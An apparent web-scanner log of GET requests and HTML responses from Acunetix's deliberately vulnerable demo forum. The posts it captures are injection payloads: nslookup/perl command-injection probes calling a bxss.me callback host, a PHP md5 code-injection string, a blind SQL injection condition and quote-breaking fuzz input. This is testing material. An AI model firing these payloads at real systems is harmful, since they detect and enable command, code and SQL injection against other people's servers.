Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4216 |
Response Body - size: 4,216 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>|(nslookup hitcsjqyrtmawb4020.bxss.me||perl -e "gethostbyname('hitcsjqyrtmawb4020.bxss.me')")</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4136 |
Response Body - size: 4,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>//xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4198 |
Response Body - size: 4,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4147 |
Response Body - size: 4,147 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>';print(md5(31337));$a='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4217 |
Response Body - size: 4,217 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>`(nslookup hitizikixkvrf2e498.bxss.me||perl -e "gethostbyname('hitizikixkvrf2e498.bxss.me')")`</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4139 |
Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>12345'"\'\");|]*</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4136 |
Response Body - size: 4,136 bytes. |
